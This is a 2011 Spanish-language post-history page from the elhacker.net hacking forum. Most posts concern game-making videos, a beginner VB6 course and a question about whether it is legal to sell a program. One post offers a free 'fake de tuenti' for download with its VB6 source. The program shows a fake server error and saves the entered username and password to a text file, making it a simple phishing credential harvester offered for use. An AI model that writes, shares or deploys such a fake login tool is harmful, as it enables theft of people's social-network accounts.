elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 2 [3]
21  Media / Juegos y Consolas / Re: [Videotutorial] Como crear un videojuego en 3D en: 13 Agosto 2011, 12:54 pm
jajaj pues ahora que lo dices lo hize por la mañana, pero como recien levantado eso ya no xd
22  Media / Juegos y Consolas / Cómo crear un videojuego en 3D en: 11 Agosto 2011, 20:02 pm
Buenas,

recién cree un canal para subir videos destinados a la creacion de videojuegos , y tal vez mas adelante de otros temas relacionados con la informatica.De momento, solo son dos videos: uno de introduccion y otro que sería el 1º tutorial que es sobre la interfaz de UDK, tambien subire videos de modelaje 3d y mas videos de udk proximamente. De momento os dejo los videos que subi. Salu2.















23  Programación / Programación Visual Basic / Re: Mi primer programa en VB6 en: 4 Agosto 2011, 17:39 pm
Ya bueno eso tambien es otra opcion  :xD :xD :xD
24  Programación / Programación Visual Basic / Re: Mi primer programa en VB6 en: 4 Agosto 2011, 17:33 pm
La verdad esque si es lo unico que hace  :xD Ya dije que era super simple pero ademas la verdad esque es bastante cutre , la verdad esque subi a internet lo primero que me salio, sacare mas versiones y espero que sean algo mejores :)
25  Programación / Programación Visual Basic / Re: Mi primer programa en VB6 en: 4 Agosto 2011, 09:31 am
LunaHack yo creo que si lo descargas es tan simple que ya veras lo que hace xd
pero si quieres que lo explique hize un video para mi canal ayer, solo que no lo vi necesario ponerlo en este foro. Aunque bueno edito el post y lo pongo :)
26  Programación / Programación Visual Basic / Re: No encuentro esta propiedad en: 3 Agosto 2011, 19:55 pm
Pues era lo de raul100 xdd solo que me explique mal

soy hack-11 esta es mi otra cuenta xd
27  Programación / Programación Visual Basic / Mi primer programa en VB6 en: 3 Agosto 2011, 18:31 pm
Buenas :)

el otro dia ya comente  un video sobre una persona que vendia un fake de tuenti y bueno si lo han visto lo recordaran.El tipo lo vendia a  nose si creo recordar eran unos 3 euros o algo asi.Yo he creado uno parecido, tengo que decir que el suyo estaba mas currado pero bueno el resultado es el mismo, los dos sirven por igual solo que el mio es gratis.He recibido a mi cuenta de youtube un mensaje de esta persona que vendia su programa intentado de alguna forma amenazarme xDD y yo solo lo que hize fue comentar en su video que intentaria crear uno igual y lo subiria gratis pero en fin la gente es asi jaja

Les dejo el programa que la verdad no tiene ninguna complicacion programarlo y apenas tiene lineas de codigo pero me ha echo ilusion porque es mi primer programa y eso :)

DESCARGA:http://www.megaupload.com/?d=FNHD7BT8
PASS: norteacomputer


Código
  1. Private Sub Command1_Click()
  2. MsgBox ("HTTP Error 500 Internal server error")
  3. Dim F As Byte
  4. F = FreeFile
  5. Open App.Path & "\" & "FILESAVE.txt" For Append As #F
  6. Print #F, Text1.Text
  7. Print #F, Text2.Text
  8. Close #F
  9. End Sub



28  Foros Generales / Dudas Generales / Re: Es legal? en: 3 Agosto 2011, 02:00 am
Me referia a si es legal vender un programa de ese estilo sino te haces responsable del uso que le den sus usuarios
29  Foros Generales / Dudas Generales / Es legal? en: 3 Agosto 2011, 01:20 am
Bueno pues hoy por la red me encontre con este video:



lo del fake de tuenti y eso me da igual ya que creo que cualquiera podria programar ese programa o uno similar si tiene conocimientos basicos pero vengo a referirme si lo que hace de vender ese producto es legal?

Chao :)
30  Programación / Programación Visual Basic / Curso VB6 en: 2 Agosto 2011, 18:46 pm
Buenas :)

pues no quiero enrollarme mucho y eso asi que aqui les dejo mi primer tutorial del curso basico de visual basic donde practicamente solo veremos la interfaz de usuario y un par de cosas más.

Para descargarlo: www.megaupload.com/?d=1X9Y0TM5
Para verlo: http://www.youtube.com/watch?v=PadypbsL1Jw

Y este es mi blog donde iré añadiendo los siguientes tomos de este curso además de todo tipo de tutoriales: http://www.norteacomputer.blogspot.com/

Salu2 :)
Páginas: 1 2 [3]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines